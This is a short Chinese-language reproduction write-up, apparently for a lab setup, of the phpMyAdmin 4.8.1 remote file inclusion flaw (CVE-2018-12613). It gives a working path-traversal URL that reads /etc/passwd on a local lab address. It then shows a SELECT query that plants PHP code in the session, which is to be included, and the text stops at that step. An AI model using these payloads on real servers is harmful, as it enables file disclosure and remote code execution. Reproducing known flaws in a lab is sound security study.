phpmyadmin 4.8.1 远程文件包含漏洞 (CVE-2018-12613)

PhpMyAdmin 是一个用 PHP 编写的免费软件工具，旨在通过 Web 处理 MySQL 的管理。该漏洞位于index.php，导致文件包含漏洞。

参考链接：

• https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
• https://www.phpmyadmin.net/security/PMASA-2018-4/

漏洞复现

环境启动后，访问http://192.168.44.132:8080. phpmyadmin 是“config”模式，所以我们可以直接登录。

访问http://192.168.44.132:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd，结果表明存在文件包含漏洞：

我们可以执行SELECT '<?=phpinfo()?>';

然后检查你的 sessionid（cookie 中 phpMyAdmin 的值），然后包含 session 文件：